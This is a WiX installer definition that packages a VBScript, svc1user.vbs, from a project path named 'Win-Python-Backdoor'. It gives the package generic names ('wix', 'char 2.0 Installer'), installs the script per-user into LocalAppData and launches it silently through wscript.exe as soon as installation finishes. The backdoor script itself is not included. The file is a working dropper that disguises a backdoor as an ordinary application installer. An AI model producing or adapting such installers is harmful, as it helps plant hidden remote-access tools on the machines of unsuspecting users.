<?xml version = '1.0' encoding = 'windows-1252' ?>
<Wix xmlns = 'http://schemas.microsoft.com/wix/2006/wi'>
<Product Name = 'wix' Id = '{A5E124B9-AB84-4C08-8A58-D455B5A082E0}' UpgradeCode = '{008EFC63-B400-4029-9403-3E66F68ABE80}' Language = '1033' Codepage = '1252' Version = '1.0.0.2' Manufacturer = 'wix'>
<Package InstallerVersion = "200" Id = '*' Platform = "x86" Keywords = 'Installer' Description = "char 2.0 Installer" Comments = 'This package will run svc1user.vbs' Manufacturer = 'wix' Languages = '1033' Compressed = 'yes' SummaryCodepage = '1252' InstallPrivileges ="limited" InstallScope = "perUser" />
<MajorUpgrade AllowSameVersionUpgrades = "no" DowngradeErrorMessage = "A newer version of wix is already installed." />
<Media Id = '1' Cabinet = 'setup.cab' EmbedCab = 'yes' DiskPrompt = 'CD - ROM #1' />
<Property Id = 'DiskPrompt' Value = 'wix 1.0.0.2 Installation[1]' />
<Icon Id = "MyIcon" SourceFile = "myicon.ico" />
<Directory Id = 'TARGETDIR' Name = 'SourceDir'>
<Directory Id = "DesktopFolder" Name = "Desktop"/>
<Directory Id = 'LocalAppDataFolder'>
<Directory Id = 'INSTALLDIR' Name = 'wix wix'>
</Directory>
</Directory>
</Directory>
<DirectoryRef Id = 'INSTALLDIR'>
<Component Win64 = "no" Id = 'MainScript' Guid = '{32B70F93-0A3A-4985-A8A5-4733A373A21B}'>
<File Id = 'vbs_id' Name = 'svc1user.vbs' DiskId = '1' Source = 'C:\Users\Francesco\Documents\GitHub\Win-Python-Backdoor\svc1user.vbs' KeyPath = 'no' />
<RegistryValue Root = "HKCU" Key = "Software\wix\wix" Name = "installed" Type = "integer" Value = "1" KeyPath = 'yes' />
<RemoveFolder Id = "CleanUpMainFolder" On="uninstall" />
</Component>
</DirectoryRef>
<CustomAction Id='StartProgram' Directory='INSTALLDIR' Return='asyncNoWait' ExeCommand='&quot;[SystemFolder32]wscript.exe&quot; &quot;[INSTALLDIR]svc1user.vbs&quot;' />
<Feature Id = 'Complete' Level = '1'>
<ComponentRef Id = 'MainScript' />
</Feature>
<InstallExecuteSequence>
<Custom Action='StartProgram' After='InstallFinalize'>(REMOVE=&quot;&quot;)</Custom>
</InstallExecuteSequence>
</Product>
</Wix>
